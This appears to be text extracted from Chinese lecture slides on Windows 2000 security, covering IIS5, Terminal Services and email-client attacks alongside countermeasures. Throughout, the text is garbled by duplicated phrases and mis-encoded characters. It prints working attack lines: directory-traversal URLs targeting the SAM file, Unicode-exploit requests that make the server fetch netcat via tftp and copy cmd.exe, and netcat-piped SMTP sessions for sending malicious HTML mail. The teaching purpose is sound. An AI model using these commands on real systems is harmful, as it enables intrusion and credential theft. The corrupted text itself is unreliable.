




版權(quán)說(shuō)明:本文檔由用戶提供并上傳,收益歸屬內(nèi)容提供方,若內(nèi)容存在侵權(quán),請(qǐng)進(jìn)行舉報(bào)或認(rèn)領(lǐng)
文檔簡(jiǎn)介
1、Windows2000Windows2000系統(tǒng)平安系統(tǒng)平安(2)-(2)-網(wǎng)絡(luò)與信息平安網(wǎng)絡(luò)與信息平安目目 錄錄IIS5的平安的平安終端效勞器平安終端效勞器平安Microsoft Internet 客戶端客戶端的平安的平安物理攻擊物理攻擊拒絕效勞攻擊拒絕效勞攻擊平安功能和工具平安功能和工具IIS5根底根本根底根本HTTPHTTP:基于文本的無(wú)狀態(tài)文件傳輸協(xié)議:基于文本的無(wú)狀態(tài)文件傳輸協(xié)議 虛擬目錄:虛擬目錄:files 映射到該系統(tǒng)磁盤(pán)的一個(gè)實(shí)際目錄上,如映射到該系統(tǒng)磁盤(pán)的一個(gè)實(shí)際目錄上,如c:inetpubwwwrootfiles對(duì)于效勞器而言那么形成如下的請(qǐng)求:對(duì)于效勞器而言那么形成如下
2、的請(qǐng)求: GET /files/index.html HTTP/1.0假設(shè)該文件存在,那么效勞器會(huì)向客戶端推送該文件并在假設(shè)該文件存在,那么效勞器會(huì)向客戶端推送該文件并在客戶端的瀏覽器上顯示;否那么會(huì)有各種錯(cuò)誤代碼客戶端的瀏覽器上顯示;否那么會(huì)有各種錯(cuò)誤代碼IIS5根底根底CGICGI:Common Gateway Interface,運(yùn)行在效勞器上的應(yīng),運(yùn)行在效勞器上的應(yīng)用程序,能針對(duì)每個(gè)請(qǐng)求生成動(dòng)態(tài)的內(nèi)容,擴(kuò)展了用程序,能針對(duì)每個(gè)請(qǐng)求生成動(dòng)態(tài)的內(nèi)容,擴(kuò)展了Web功能功能調(diào)用調(diào)用CGI scripts/cgi.exe?var1+var2Windows中幾乎所有的可執(zhí)行程序都可以作為效勞器端的
3、中幾乎所有的可執(zhí)行程序都可以作為效勞器端的CGI應(yīng)用程序來(lái)執(zhí)行應(yīng)用程序來(lái)執(zhí)行其中其中cmd.exe經(jīng)常被作為尋找的目標(biāo)經(jīng)常被作為尋找的目標(biāo)IIS5根底根底ASP和和ISAPIASP:Active Server Pages ISAPI: Interface Server Application Programming Interface調(diào)用調(diào)用ASP scripts/script.asp?var1=x&var2=y調(diào)用調(diào)用ISAPI :/ /isapi.dll? var1&var2HTTP攻擊手段攻擊手段使用使用./進(jìn)行文件系統(tǒng)遍歷進(jìn)行文件系統(tǒng)遍歷U
4、RL的十六進(jìn)制編碼的十六進(jìn)制編碼使用使用 ./ 進(jìn)行文件系統(tǒng)遍歷進(jìn)行文件系統(tǒng)遍歷 : / / i n f o s e c . p k u . e d u /././././winnt/secret.txt通常是在目錄上設(shè)置不當(dāng)?shù)耐ǔJ窃谀夸浬显O(shè)置不當(dāng)?shù)腘TFS訪問(wèn)控制列表所導(dǎo)訪問(wèn)控制列表所導(dǎo)致的致的 : / / i n f o s e c . p k u . e d u /././././winnt/repair/samURL的十六進(jìn)制編碼的十六進(jìn)制編碼Http允許允許URL中使用十六進(jìn)制編碼形式輸入字符串中使用十六進(jìn)制編碼形式輸入字符串利用利用URL的十六進(jìn)制編碼攻擊的十六進(jìn)制編碼攻擊 :/
5、 /././winnt/repair/sam :/ 2F 2E 2E 2F 2E 2E 2F winnt/repair/sam能防止入侵檢測(cè)系統(tǒng)的檢測(cè),或可以導(dǎo)致應(yīng)用程序錯(cuò)誤處理輸能防止入侵檢測(cè)系統(tǒng)的檢測(cè),或可以導(dǎo)致應(yīng)用程序錯(cuò)誤處理輸入入IIS5緩沖區(qū)溢出緩沖區(qū)溢出IPP緩沖區(qū)溢出緩沖區(qū)溢出索引效勞索引效勞ISAPI擴(kuò)展緩沖區(qū)溢出擴(kuò)展緩沖區(qū)溢出Code Red蠕蟲(chóng)蠕蟲(chóng)ida/idq緩沖區(qū)溢出緩沖區(qū)溢出FrontPage 2000效勞器擴(kuò)展緩沖區(qū)溢出效勞器擴(kuò)展緩沖區(qū)溢出平安對(duì)策平安對(duì)策在系統(tǒng)驅(qū)動(dòng)器之外的驅(qū)動(dòng)器上安裝在系統(tǒng)驅(qū)動(dòng)器之外的驅(qū)動(dòng)
6、器上安裝Web文件夾文件夾Web效勞器所在的卷應(yīng)使用效勞器所在的卷應(yīng)使用NTFS并謹(jǐn)慎設(shè)置并謹(jǐn)慎設(shè)置ACL移動(dòng)、刪除或改名可能被利用的可執(zhí)行文件:移動(dòng)、刪除或改名可能被利用的可執(zhí)行文件:cacls,xcacls在效勞器的在效勞器的Write和和Execute ACL中刪除中刪除Everyone和和Users Group掌握對(duì)日志中攻擊標(biāo)志的分析掌握對(duì)日志中攻擊標(biāo)志的分析將文件寫(xiě)入將文件寫(xiě)入Web效勞器效勞器如在目標(biāo)機(jī)上建立如在目標(biāo)機(jī)上建立tftp效勞器,然后上載文件:效勞器,然后上載文件: GET /scripts/.%c0%af./winnt/system32/tftp.exe? “-i+1
7、1+GET+nc.exe c:nc.exe HTTP/1.0 將將netcat寫(xiě)入到寫(xiě)入到C:,因?yàn)槟J(rèn)情況下所有用戶,因?yàn)槟J(rèn)情況下所有用戶對(duì)對(duì)C:具有寫(xiě)權(quán)限具有寫(xiě)權(quán)限如將目標(biāo)機(jī)器上如將目標(biāo)機(jī)器上cmd.exe改名為改名為cmdl.exe GET /scripts/.%c0%af./winnt/system32/cmd.exe?+copy+ c:winntsystem32cmd.exe+c:cmdl.exe HTTP/1.0其它自動(dòng)上載工具:如其它自動(dòng)上載工具:如unicodeloader等等通過(guò)通過(guò)IIS5提升權(quán)限提升權(quán)限通 過(guò)通 過(guò) I n P r o c e s
8、 s l s a p i A p p s 利 用利 用RevertToSelf 安裝安裝MS01-026補(bǔ)丁可以解決補(bǔ)丁可以解決源代碼泄漏攻擊源代碼泄漏攻擊起因起因IIS中的程序缺陷中的程序缺陷低劣的低劣的Web編程技術(shù)編程技術(shù)常見(jiàn)的漏洞常見(jiàn)的漏洞+.htr(ism.dll)Webhits(webhits.dll)Translate: f (WebDAV, ext.dll)WebDAV目錄列表目錄列表 ext.dll)Web效勞器平安評(píng)估工具效勞器平安評(píng)估工具Stealth HTTP Scanner SSLProxy Achilles Wfetch WhiskerWeb效勞器平安忠告效勞器平安
9、忠告在路由器、防火墻或其它位于在路由器、防火墻或其它位于Web效勞器周邊位置的設(shè)備上效勞器周邊位置的設(shè)備上應(yīng)用網(wǎng)路級(jí)的訪問(wèn)控制應(yīng)用網(wǎng)路級(jí)的訪問(wèn)控制在主機(jī)級(jí),阻塞在主機(jī)級(jí),阻塞Web效勞器上所有不必要的流入和流出連接效勞器上所有不必要的流入和流出連接隨時(shí)安裝熱修復(fù):隨時(shí)安裝熱修復(fù):刪除不必要的腳本映射和不使用的刪除不必要的腳本映射和不使用的ISAPI應(yīng)用程序應(yīng)用程序DLL禁用不必要的效勞禁用不必要的效勞在應(yīng)用在應(yīng)用Web效勞之前,強(qiáng)烈推薦使用效勞之前,強(qiáng)烈推薦使用Security Template來(lái)來(lái)對(duì)其進(jìn)行配置對(duì)其進(jìn)行配置Web效勞器平安忠告效勞器平安忠告在系統(tǒng)卷之外建立一個(gè)獨(dú)立的卷來(lái)存放在系
10、統(tǒng)卷之外建立一個(gè)獨(dú)立的卷來(lái)存放Web根目錄根目錄Web效勞器所在的卷應(yīng)使用效勞器所在的卷應(yīng)使用NTFS文件系統(tǒng),明確的設(shè)置文件系統(tǒng),明確的設(shè)置ACL刪除刪除Everyone、Users和其它非特權(quán)組所在目錄上的寫(xiě)文件和其它非特權(quán)組所在目錄上的寫(xiě)文件和執(zhí)行文件權(quán)限和執(zhí)行文件權(quán)限不要將私有數(shù)據(jù)保存在不要將私有數(shù)據(jù)保存在ASP文件或包含有文件中文件或包含有文件中停止停止Administration Web站點(diǎn),刪除站點(diǎn),刪除IISAdmin和和IISHelp虛擬目錄以及它們對(duì)應(yīng)的真實(shí)目錄虛擬目錄以及它們對(duì)應(yīng)的真實(shí)目錄 目目 錄錄IIS5的平安的平安終端效勞器平安終端效勞器平安Microsoft In
11、ternet 客戶端客戶端的平安的平安物理攻擊物理攻擊拒絕效勞攻擊拒絕效勞攻擊平安功能和工具平安功能和工具TSWindows 2000提供了交互式的圖形化遠(yuǎn)程提供了交互式的圖形化遠(yuǎn)程shell,稱為終端,稱為終端效勞效勞(Terminal Service,TS),適用于遠(yuǎn)程管理或應(yīng)用程序,適用于遠(yuǎn)程管理或應(yīng)用程序共享共享引用引用 microsoft 的說(shuō)法,的說(shuō)法,“Windows 2000終端效勞終端效勞使你能夠從各種設(shè)備上,通過(guò)幾乎任何類型的網(wǎng)絡(luò)連接遠(yuǎn)程的使你能夠從各種設(shè)備上,通過(guò)幾乎任何類型的網(wǎng)絡(luò)連接遠(yuǎn)程的基于基于Windows 2000的效勞器,并在其上遠(yuǎn)程執(zhí)行應(yīng)用程序的效勞器,并在其
12、上遠(yuǎn)程執(zhí)行應(yīng)用程序TSTS緊密集成在操作系統(tǒng)內(nèi)部,免費(fèi)提供遠(yuǎn)程管理模緊密集成在操作系統(tǒng)內(nèi)部,免費(fèi)提供遠(yuǎn)程管理模式式(最多有兩個(gè)同時(shí)連接的會(huì)語(yǔ)以及一個(gè)控制臺(tái)最多有兩個(gè)同時(shí)連接的會(huì)語(yǔ)以及一個(gè)控制臺(tái))TS 可以在你和效勞器之間提供不同的認(rèn)證和加密方可以在你和效勞器之間提供不同的認(rèn)證和加密方法。對(duì)法。對(duì)Windows 2000來(lái)說(shuō),終端效勞器正在逐漸來(lái)說(shuō),終端效勞器正在逐漸成為與成為與UNIX世界中的世界中的SSH一樣重要的圖形化產(chǎn)品一樣重要的圖形化產(chǎn)品TS的代價(jià)的代價(jià) 在本節(jié)中,我們將從平安的角度來(lái)考查T(mén)S的根本功能、如何識(shí)別和枚舉TS、解決不合理的TS實(shí)現(xiàn)的問(wèn)題、的針對(duì)TS的攻擊,以及在網(wǎng)絡(luò)環(huán)境中
13、保護(hù)和管理TS的根本知識(shí)TS組件組件效勞器效勞器遠(yuǎn)程桌面協(xié)議遠(yuǎn)程桌面協(xié)議(Remote Desktop Protocol,RDP)客戶端客戶端TS效勞器效勞器TS集成在所有集成在所有Windows 2000效勞器中,通過(guò)控制面效勞器中,通過(guò)控制面板中的板中的Windows組件功能可以很容易地啟用和禁用組件功能可以很容易地啟用和禁用在以管理模式安裝時(shí),效勞器是標(biāo)準(zhǔn)的組件;當(dāng)作為遠(yuǎn)在以管理模式安裝時(shí),效勞器是標(biāo)準(zhǔn)的組件;當(dāng)作為遠(yuǎn)程應(yīng)用程序效勞器時(shí),它需要額外的授權(quán)費(fèi)用和架構(gòu)程應(yīng)用程序效勞器時(shí),它需要額外的授權(quán)費(fèi)用和架構(gòu)效勞器的默認(rèn)監(jiān)聽(tīng)端口為效勞器的默認(rèn)監(jiān)聽(tīng)端口為T(mén)CP 3389 (稍后將會(huì)介紹自稍
14、后將會(huì)介紹自行指定端口是很容易的行指定端口是很容易的)遠(yuǎn)程桌面協(xié)議遠(yuǎn)程桌面協(xié)議(RDP)在客戶端和效勞器之間的數(shù)據(jù)傳輸是通過(guò)在客戶端和效勞器之間的數(shù)據(jù)傳輸是通過(guò)Microsoft的的基于基于TCP的遠(yuǎn)程桌面協(xié)議的遠(yuǎn)程桌面協(xié)議(RDP-5)進(jìn)行的進(jìn)行的RDP提供了三層加密以確保點(diǎn)對(duì)點(diǎn)數(shù)據(jù)傳輸?shù)钠桨残裕禾峁┝巳龑蛹用芤源_保點(diǎn)對(duì)點(diǎn)數(shù)據(jù)傳輸?shù)钠桨残裕?0、56或或128位位RC4與與Windows NT版本的版本的RDP-4相比,相比,Windows 2000提供了更多的根本功能,可以在大多數(shù)的網(wǎng)絡(luò)提供了更多的根本功能,可以在大多數(shù)的網(wǎng)絡(luò)環(huán)境中高效的使用環(huán)境中高效的使用客戶端客戶端通過(guò)通過(guò)MS安裝程序
15、安裝程序(MSI)軟件包安裝的獨(dú)立的軟件包安裝的獨(dú)立的16位或位或32位可執(zhí)位可執(zhí)行文件行文件終端效勞高級(jí)客戶端終端效勞高級(jí)客戶端(Terminal Services Advanced Alient,TSAC),基于,基于Win32的的ActiveX控件,可以在控件,可以在Web頁(yè)面中使頁(yè)面中使用用MMC管理單元管理單元 盡管它們互相之間存在明顯的區(qū)別,但各種不同的客戶端盡管它們互相之間存在明顯的區(qū)別,但各種不同的客戶端都用完全相同的方法來(lái)實(shí)現(xiàn)都用完全相同的方法來(lái)實(shí)現(xiàn)RDP。因此,盡管它們看起來(lái)似。因此,盡管它們看起來(lái)似乎不一樣,但所有的乎不一樣,但所有的TS客戶端在與效勞器進(jìn)行對(duì)話時(shí)都以完客
16、戶端在與效勞器進(jìn)行對(duì)話時(shí)都以完全相同的方式進(jìn)行操作全相同的方式進(jìn)行操作修改修改TS監(jiān)聽(tīng)端口效勞器監(jiān)聽(tīng)端口效勞器端端通過(guò)修改下面的注冊(cè)表鍵值,通過(guò)修改下面的注冊(cè)表鍵值,TS的默認(rèn)端口可以重的默認(rèn)端口可以重新指定新指定 HKLMSystemCurrentControlSetControl Terminal Server WinStationsRDP-Tcp鍵值:鍵值:PortNumber REG_DWORD=3389修改修改TS監(jiān)聽(tīng)端口客戶端監(jiān)聽(tīng)端口客戶端第一步是在第一步是在TS客戶端連接管理器中與目標(biāo)主機(jī)建立連接客戶端連接管理器中與目標(biāo)主機(jī)建立連接一旦創(chuàng)立了一個(gè)連接之后,選定該連接并從一旦創(chuàng)立了
17、一個(gè)連接之后,選定該連接并從File菜單中選菜單中選擇擇Export,將全部配置設(shè)置保存到以一個(gè),將全部配置設(shè)置保存到以一個(gè)CNS為擴(kuò)展名為擴(kuò)展名的文本文件中去的文本文件中去使用文本編輯器翻開(kāi)這個(gè)文件,將使用文本編輯器翻開(kāi)這個(gè)文件,將Server Port修改為在修改為在效勞器上指定端口,如下例所示效勞器上指定端口,如下例所示(自定義連接端口為自定義連接端口為7777) 修改修改TS監(jiān)聽(tīng)端口客戶端監(jiān)聽(tīng)端口客戶端CorpTermServWinPosStr=0,2,0,0,941,639Expand=1Smooth Scrolling=0Shadow Bitmap Enabled=1Dedicat
18、ed Terminal=0Server Port=7777Enable Mouse=1etc. 識(shí)別和查找識(shí)別和查找TS3389端口掃描端口掃描TSProbeTSEnum 攻擊攻擊TS密碼猜測(cè)攻擊密碼猜測(cè)攻擊用戶權(quán)限提升用戶權(quán)限提升畸形畸形RDP拒絕效勞攻擊拒絕效勞攻擊 密碼猜測(cè)攻擊密碼猜測(cè)攻擊-TSGrinder.exeT S 登 錄 等 價(jià) 于 真 正 的 交 互 式 登 錄 , 因 此 對(duì) 真 正 的登 錄 等 價(jià) 于 真 正 的 交 互 式 登 錄 , 因 此 對(duì) 真 正 的Administrator賬戶是不能設(shè)置鎖定閾值的。這意味著在賬戶是不能設(shè)置鎖定閾值的。這意味著在啟用了啟用了T
19、S效勞的情況下,對(duì)密碼猜測(cè)攻擊來(lái)說(shuō),本地效勞的情況下,對(duì)密碼猜測(cè)攻擊來(lái)說(shuō),本地Administrator賬戶是一個(gè)最易受攻擊的目標(biāo)賬戶是一個(gè)最易受攻擊的目標(biāo)Tim Mullen開(kāi)發(fā)了開(kāi)發(fā)了TSGrinder的工具,它能夠通過(guò)的工具,它能夠通過(guò)TS對(duì)對(duì)本地本地Administrator賬戶進(jìn)行字典攻擊賬戶進(jìn)行字典攻擊密碼猜測(cè)攻擊密碼猜測(cè)攻擊-TSGrinder.exeTSGrinder使用使用TS的的ActiveX控件來(lái)進(jìn)行攻擊。盡管這個(gè)控件來(lái)進(jìn)行攻擊。盡管這個(gè)ActiveX控件經(jīng)過(guò)特殊的設(shè)計(jì)可以拒絕對(duì)密碼方法的腳本訪問(wèn),控件經(jīng)過(guò)特殊的設(shè)計(jì)可以拒絕對(duì)密碼方法的腳本訪問(wèn),但 通 過(guò)但 通 過(guò) C
20、+ + 中 的中 的 v t a b l e 綁 定 仍 然 可 以 訪 問(wèn)綁 定 仍 然 可 以 訪 問(wèn)ImsTscNonScriptable接口方法。這允許為該控件編寫(xiě)自定接口方法。這允許為該控件編寫(xiě)自定義的接口,于是攻擊者就可以對(duì)義的接口,于是攻擊者就可以對(duì)Administrator賬戶進(jìn)行密碼賬戶進(jìn)行密碼猜測(cè),直至猜測(cè)出密碼猜測(cè),直至猜測(cè)出密碼 hammerofgod 上提供下載上提供下載 密碼猜測(cè)攻擊的防御密碼猜測(cè)攻擊的防御推薦將本地推薦將本地Administrator賬戶改名賬戶改名防御防御TS密碼猜測(cè)攻擊的另一種有趣的方法是為密碼猜測(cè)攻擊的另一種有趣的方法是為Windows登錄窗
21、口制作一個(gè)自定義的法律聲明,通過(guò)登錄窗口制作一個(gè)自定義的法律聲明,通過(guò)添加或編輯如下的注冊(cè)表鍵值就可以實(shí)現(xiàn):添加或編輯如下的注冊(cè)表鍵值就可以實(shí)現(xiàn):HKLMSOFTWAREMicrosoftWindowsNTCurrentVersionWinLogon 用戶權(quán)限提升用戶權(quán)限提升推薦實(shí)現(xiàn)推薦實(shí)現(xiàn)Windows 2000 Resource Kit中的一些中的一些關(guān)鍵功能關(guān)鍵功能其中最重要的是,其中最重要的是,“Appsec可以使管理員能夠限可以使管理員能夠限制用戶只能運(yùn)行特定的應(yīng)用程序制用戶只能運(yùn)行特定的應(yīng)用程序這能夠減小攻擊者在獲取本地用戶訪問(wèn)之后進(jìn)行權(quán)限這能夠減小攻擊者在獲取本地用戶訪問(wèn)之后進(jìn)行
22、權(quán)限提升攻擊的危險(xiǎn)提升攻擊的危險(xiǎn) IME遠(yuǎn)程遠(yuǎn)程Root獲取獲取輸入法編輯器輸入法編輯器(Input Method Editor,IME)漏洞,這個(gè)漏洞漏洞,這個(gè)漏洞導(dǎo)致可以不用提供任何憑據(jù)就能通過(guò)導(dǎo)致可以不用提供任何憑據(jù)就能通過(guò)TS的認(rèn)證的認(rèn)證IME用來(lái)將標(biāo)準(zhǔn)的用來(lái)將標(biāo)準(zhǔn)的101鍵鍵盤(pán)映射到某種語(yǔ)言中的大量可用字鍵鍵盤(pán)映射到某種語(yǔ)言中的大量可用字符,例如日語(yǔ)、中文和韓國(guó)語(yǔ)都需要符,例如日語(yǔ)、中文和韓國(guó)語(yǔ)都需要IME。雖然。雖然IME通常在本通常在本地用戶的上下文中進(jìn)行正常操作,但登錄時(shí),地用戶的上下文中進(jìn)行正常操作,但登錄時(shí),IME卻在卻在SYSTEM上下文中運(yùn)行。這使得通過(guò)遠(yuǎn)程效勞器的登錄
23、屏幕上下文中運(yùn)行。這使得通過(guò)遠(yuǎn)程效勞器的登錄屏幕運(yùn)行精心設(shè)計(jì)的命令成為可能運(yùn)行精心設(shè)計(jì)的命令成為可能IME對(duì)策對(duì)策只有簡(jiǎn)體中文版系統(tǒng)或在初始安裝過(guò)程中安裝了簡(jiǎn)體只有簡(jiǎn)體中文版系統(tǒng)或在初始安裝過(guò)程中安裝了簡(jiǎn)體中文中文IME的系統(tǒng)才會(huì)有這個(gè)漏洞的系統(tǒng)才會(huì)有這個(gè)漏洞Microsoft發(fā)布的公告發(fā)布的公告MS00-069和補(bǔ)丁能夠?yàn)樗脱a(bǔ)丁能夠?yàn)樗惺苡绊懙陌姹窘鉀Q這個(gè)問(wèn)題有受影響的版本解決這個(gè)問(wèn)題畸形畸形RDP拒絕效勞拒絕效勞2001年年1月,月,Yoichi Ubukata和和Yoshihiro Kawabata發(fā)現(xiàn)了發(fā)現(xiàn)了RDP中的一個(gè)漏洞,這個(gè)漏洞可能中的一個(gè)漏洞,這個(gè)漏洞可能導(dǎo)致拒絕效勞的情
24、況出現(xiàn)。如果攻擊者發(fā)送一種畸形導(dǎo)致拒絕效勞的情況出現(xiàn)。如果攻擊者發(fā)送一種畸形的報(bào)文,它將使的報(bào)文,它將使RDP癱瘓。這種攻擊會(huì)導(dǎo)致當(dāng)前正在癱瘓。這種攻擊會(huì)導(dǎo)致當(dāng)前正在進(jìn)行的全部工作喪失,并且需要重新啟動(dòng)系統(tǒng)才能恢進(jìn)行的全部工作喪失,并且需要重新啟動(dòng)系統(tǒng)才能恢復(fù)效勞復(fù)效勞Microsoft發(fā)布了一個(gè)補(bǔ)丁發(fā)布了一個(gè)補(bǔ)丁(MS01-006),通過(guò)修改,通過(guò)修改終端效勞器效勞使它正確地處理數(shù)據(jù),從而消除這個(gè)終端效勞器效勞使它正確地處理數(shù)據(jù),從而消除這個(gè)漏洞漏洞目目 錄錄IIS5的平安的平安終端效勞器平安終端效勞器平安Microsoft Internet 客戶端客戶端的平安的平安物理攻擊物理攻擊拒絕效勞
25、攻擊拒絕效勞攻擊平安功能和工具平安功能和工具攻擊類型攻擊類型緩沖區(qū)溢出,可被用來(lái)執(zhí)行任意的代碼而無(wú)需與用戶進(jìn)行任何緩沖區(qū)溢出,可被用來(lái)執(zhí)行任意的代碼而無(wú)需與用戶進(jìn)行任何交互交互通過(guò)欺騙、強(qiáng)制或暗中執(zhí)行命令,使用戶運(yùn)行由攻擊者預(yù)先選通過(guò)欺騙、強(qiáng)制或暗中執(zhí)行命令,使用戶運(yùn)行由攻擊者預(yù)先選擇的可執(zhí)行內(nèi)容。這種方法有以下一些變化:擇的可執(zhí)行內(nèi)容。這種方法有以下一些變化: 巧妙偽裝的、看起來(lái)無(wú)害的電子郵件附件巧妙偽裝的、看起來(lái)無(wú)害的電子郵件附件 嵌入在嵌入在HTML Web頁(yè)面或電子郵件中的可執(zhí)行內(nèi)頁(yè)面或電子郵件中的可執(zhí)行內(nèi)容容 活動(dòng)內(nèi)容技術(shù)的漏洞導(dǎo)致非法代碼的執(zhí)行活動(dòng)內(nèi)容技術(shù)的漏洞導(dǎo)致非法代碼的執(zhí)行
26、ActiveX控件,尤其是那些標(biāo)記有控件,尤其是那些標(biāo)記有“可以在腳本中可以在腳本中平安使用的控件平安使用的控件 Java虛擬機(jī)的程序缺陷虛擬機(jī)的程序缺陷(Brown Orifice)攻擊類型攻擊類型訪問(wèn)腳本訪問(wèn)腳本/自動(dòng)化接口,例如自動(dòng)化接口,例如Outlook地址簿蠕蟲(chóng)地址簿蠕蟲(chóng)寫(xiě)本地文件,通常是在可執(zhí)行的目錄中;經(jīng)常通過(guò)臨時(shí)目錄寫(xiě)本地文件,通常是在可執(zhí)行的目錄中;經(jīng)常通過(guò)臨時(shí)目錄或緩存位置的不適當(dāng)泄露發(fā)生。一旦在本地寫(xiě)入文件,它就或緩存位置的不適當(dāng)泄露發(fā)生。一旦在本地寫(xiě)入文件,它就可以執(zhí)行并運(yùn)行在本地計(jì)算機(jī)平安區(qū)域的上下文中,從而是可以執(zhí)行并運(yùn)行在本地計(jì)算機(jī)平安區(qū)域的上下文中,從而是完全
27、受到信任的完全受到信任的讀取本地文件,例如通過(guò)讀取本地文件,例如通過(guò)HTML跨幀導(dǎo)航問(wèn)題或使用跨幀導(dǎo)航問(wèn)題或使用IFRAME。這種技術(shù)的一個(gè)常見(jiàn)結(jié)果是從。這種技術(shù)的一個(gè)常見(jiàn)結(jié)果是從Web瀏覽器的瀏覽器的cookie中獲取用戶的密碼數(shù)據(jù)中獲取用戶的密碼數(shù)據(jù)調(diào)用客戶端出站連接調(diào)用客戶端出站連接惡意惡意Web頁(yè)面頁(yè)面客戶端的一種最常見(jiàn)形式是在客戶端的一種最常見(jiàn)形式是在Internet上部署惡意的上部署惡意的Web效勞器,存放經(jīng)過(guò)精心設(shè)計(jì)的內(nèi)容,用來(lái)誘騙用戶的數(shù)據(jù)效勞器,存放經(jīng)過(guò)精心設(shè)計(jì)的內(nèi)容,用來(lái)誘騙用戶的數(shù)據(jù)這種方法的有效性取決于提高惡意這種方法的有效性取決于提高惡意Web站點(diǎn)站點(diǎn)/頁(yè)面的訪問(wèn)量,
28、頁(yè)面的訪問(wèn)量,這通常是通過(guò)電子郵件或新聞組這通常是通過(guò)電子郵件或新聞組/列表文章來(lái)進(jìn)行的列表文章來(lái)進(jìn)行的惡意惡意E-mail由于由于HTML功能的多樣性功能的多樣性(嵌入小程序或控件、活動(dòng)腳本、跨幀瀏覽、內(nèi)聯(lián)嵌入小程序或控件、活動(dòng)腳本、跨幀瀏覽、內(nèi)聯(lián)幀、幀、cookie解析等等解析等等),HTML電子郵件成為理想的攻擊媒介電子郵件成為理想的攻擊媒介由于接收端的漏洞導(dǎo)致這樣的問(wèn)題,由于接收端的漏洞導(dǎo)致這樣的問(wèn)題,Microsoft雖然備受指責(zé),然而通過(guò)雖然備受指責(zé),然而通過(guò)Outlook或或Outlook Express(OE)這樣的程序發(fā)送惡意編寫(xiě)的這樣的程序發(fā)送惡意編寫(xiě)的HTML卻十卻十分困
29、難。這些圖形化的電子郵件客戶端不允許對(duì)郵件消息的內(nèi)容進(jìn)行直接分困難。這些圖形化的電子郵件客戶端不允許對(duì)郵件消息的內(nèi)容進(jìn)行直接的操作,而為實(shí)現(xiàn)攻擊目的卻需要這樣做的操作,而為實(shí)現(xiàn)攻擊目的卻需要這樣做如果要在如果要在Windows上模擬這種命令行功能,可以通過(guò)命令行提示符直接向上模擬這種命令行功能,可以通過(guò)命令行提示符直接向簡(jiǎn)單郵件傳輸協(xié)議簡(jiǎn)單郵件傳輸協(xié)議(Simple Mail Transfer Protocol,SMTP)效勞器手動(dòng)效勞器手動(dòng)發(fā)送消息。最正確的方法是將適當(dāng)?shù)陌l(fā)送消息。最正確的方法是將適當(dāng)?shù)腟MTP命令和數(shù)據(jù)寫(xiě)入到一個(gè)文本文命令和數(shù)據(jù)寫(xiě)入到一個(gè)文本文件中,然后通過(guò)管道輸入給件中,
30、然后通過(guò)管道輸入給netcatEmail Hacking首先,將所需的首先,將所需的SMTP命令和消息數(shù)據(jù)寫(xiě)入到一個(gè)文件中命令和消息數(shù)據(jù)寫(xiě)入到一個(gè)文件中helo somedomain mail from: rcpt to: datasubject: Read this!Importance: highMIME-Version: 1.0Content-Type: text/html; charset=us-asciiContent-Transfer-Encoding: 7bitHello World!.quitEmail Hacking然后在命令行中將這個(gè)文件通過(guò)管道傳遞給然后在命令行中將這個(gè)文
31、件通過(guò)管道傳遞給netcat,而,而netcat那么應(yīng)該指那么應(yīng)該指向適當(dāng)?shù)泥]件效勞器的向適當(dāng)?shù)泥]件效勞器的SMTP監(jiān)聽(tīng)端口監(jiān)聽(tīng)端口25,例如:,例如:C:type malicious.txt | nc -vv 25Email Hacking惡意的攻擊者通常會(huì)選擇一些提供無(wú)限制的惡意的攻擊者通常會(huì)選擇一些提供無(wú)限制的SMTP消息中繼的不引人注消息中繼的不引人注意的郵件效勞器,而且會(huì)盡可能隱藏他們自己的源意的郵件效勞器,而且會(huì)盡可能隱藏他們自己的源IP地址,這樣就不可地址,這樣就不可能通過(guò)郵件效勞器的日志來(lái)追查到他們能通過(guò)郵件效勞器的日志來(lái)追查到他們這樣的這樣的“開(kāi)放式開(kāi)放式SMTP中繼通常被垃
32、圾郵件所利用,在中繼通常被垃圾郵件所利用,在Usenet的討的討論或上經(jīng)??梢哉业竭@樣的效勞器論或上經(jīng)常可以找到這樣的效勞器Email Hacking如果希望隨如果希望隨HTML格式的消息發(fā)送一個(gè)附件,那么必須向消息中添加另一格式的消息發(fā)送一個(gè)附件,那么必須向消息中添加另一個(gè)個(gè)MIME局部,根據(jù)局部,根據(jù)MIME標(biāo)準(zhǔn)標(biāo)準(zhǔn)(RFC 2045-49)用用Base64格式對(duì)附件進(jìn)格式對(duì)附件進(jìn)行編碼行編碼用以自動(dòng)完成這項(xiàng)工作的最正確工具是用以自動(dòng)完成這項(xiàng)工作的最正確工具是John G. Myers的的mpack。mpack能夠自動(dòng)添加正確的能夠自動(dòng)添加正確的MIME頭,這樣它的輸出就可以直接發(fā)送給頭,
33、這樣它的輸出就可以直接發(fā)送給SMTP效勞效勞器器下面的例子使用下面的例子使用mpack對(duì)一個(gè)名為對(duì)一個(gè)名為plant.txt的文件進(jìn)行編碼,輸出到文件的文件進(jìn)行編碼,輸出到文件plant.mim中。可選的中。可選的-s參數(shù)用以指定消息的主題行參數(shù)用以指定消息的主題行 C:mpack -s Nasty-gram -o plant.mim plant.txtEmail Hacking下面將下面將MIME局部插入到現(xiàn)有的局部插入到現(xiàn)有的HTML格式的消息中去格式的消息中去對(duì)前面的對(duì)前面的malicious.txt來(lái)說(shuō),使用來(lái)說(shuō),使用“Content-Type:一行中自定義一行中自定義的的MIME邊界
34、來(lái)劃分該消息。邊界來(lái)劃分該消息。MIME邊界以兩個(gè)連字符開(kāi)始,結(jié)束邊界邊界以兩個(gè)連字符開(kāi)始,結(jié)束邊界以兩個(gè)連字符為后綴。還要注意嵌套的以兩個(gè)連字符為后綴。還要注意嵌套的“multipart/alternativeMIME局部局部(boundary2),這樣,這樣Outlook接收者就能夠正確地對(duì)接收者就能夠正確地對(duì)HTML消息正文進(jìn)行解碼消息正文進(jìn)行解碼一定要十分注意換行的位置,因?yàn)橐欢ㄒ肿⒁鈸Q行的位置,因?yàn)镸IME的解析根據(jù)它們的位置有著的解析根據(jù)它們的位置有著很大的不同。這個(gè)消息的重要性被設(shè)置為很大的不同。這個(gè)消息的重要性被設(shè)置為high(高高),這是誘使受害者,這是誘使受害者上當(dāng)受騙
